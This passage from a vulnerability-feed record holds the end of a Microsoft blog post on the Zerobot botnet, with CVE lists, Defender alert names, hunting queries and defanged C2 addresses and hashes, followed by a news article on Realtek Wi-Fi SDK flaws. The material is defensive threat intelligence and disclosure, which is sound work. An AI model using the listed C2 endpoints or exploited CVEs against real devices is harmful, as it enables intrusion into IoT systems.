cleanup of all unused and stale executables sitting on your or your organization\u2019s devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. 
With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), 
SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n | where SignatureName == \"HTTP_Client\"\n | project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n | project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n**SparkRat hashes (SHA-256):**\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mmpc", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MMPC:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:13", "description": "[](<https://thehackernews.com/images/-PiZWCeBTtNg/YRtRHWkDPnI/AAAAAAAADjU/14jyow9NKv8ROnMPT_eVpKuR-OFvSGofACLcBGAsYHQ/s0/wifi.jpg>)\n\nTaiwanese chip designer Realtek is warning of [four security 
vulnerabilities](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) in three software development kits (SDKs) accompanying its WiFi modules, which are used in almost 200 IoT devices made by at least 65 vendors.\n\nThe flaws, which affect Realtek SDK v2.x, Realtek \"Jungle\" SDK v3.0/v3.1/v3.2/v3.4.x/v3.4T/v3.4T-CT, and Realtek \"Luna\" SDK up to version 1.3.2, could be abused by attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege \u2014\n\n * **CVE-2021-35392** (CVSS score: 8.1) - Heap buffer overflow vulnerability in 'WiFi Simple Config' server due to unsafe crafting of SSDP NOTIFY messages\n * **CVE-2021-35393** (CVSS score: 8.1) - Stack buffer overflow vulnerability in 'WiFi Simple Config' server due to unsafe parsing of the UPnP SUBSCRIBE/UNSUBSCRIBE Callback header\n * **CVE-2021-35394** (CVSS score: 9.8) - Multiple buffer overflow vulnerabilities and an arbitrary command injection vulnerability in 'UDPServer' MP tool\n * **CVE-2021-35395** (CVSS score: 9.8) - Multiple buffer overflow vulnerabilities in HTTP web server 'boa' due to unsafe copies of some overly long parameters\n\nImpacting devices that implement wireless capabilities, the list includes residential gateways, travel routers, WiFi repeaters, IP cameras, smart lighting gateways, and even connected toys from a wide range of manufacturers such as AIgital, ASUSTek, Beeline, Belkin, Buffalo, D-Link, Edimax, Huawei, LG, Logitec, MT-Link, Netis, Netgear, Occtel, PATECH, TCL, Sitecom, ZTE, Zyxel, and Realtek's own router lineup.\n\n\"We got 198 unique fingerprints for devices that answered over UPnP. 
If we estimate that each device may have sold 5k copies (on average), the total count of affected devices would be close to a million,\" researchers said.\n\nWhile patches have been released for Realtek \"Luna\" SDK in version 1.3.2a, users of the \"Jungle\" SDK are recommended to backport the fixes provided by the company.\n\nThe security issues are said to have remained untouched in Realtek's codebase for more than a decade, German cybersecurity specialist IoT Inspector, which [discovered](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>) the weaknesses, said in a report published Monday, three months after disclosing them to Realtek in May 2021.\n\n\"On the product vendor's end, [...] manufacturers with access to the Realtek source code [...] missed to sufficiently validate their supply chain, [and] left the issues unspotted and distributed the vulnerabilities to hundreds of thousands of end customers \u2014 leaving them vulnerable to attacks,\" the researchers said.\n\n**_Update:_** Three days after details about the Realtek vulnerabilities were revealed, active exploitation attempts were detected spreading a variant of the Mirai malware and roping the compromised devices into a botnet. The same threat actor behind this Mirai-based botnet has also been linked to a [string of attacks](<https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html>) since at least February 2021, leveraging newly disclosed flaws in network security appliances and home routers.\n\n\"This chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly,\" network security firm SAM Seamless Network [said](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) last week. 
\"These kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-17T06:19:00", "type": "thn", "title": "Multiple Flaws Affecting Realtek Wi-Fi SDKs Impact Nearly a Million IoT Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35392", "CVE-2021-35393", "CVE-2021-35394", "CVE-2021-35395"], "modified": "2021-08-24T04:42:33", "id": "THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1", "href": "https://thehackernews.com/2021/08/multiple-flaws-affecting-realtek-wi-fi.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}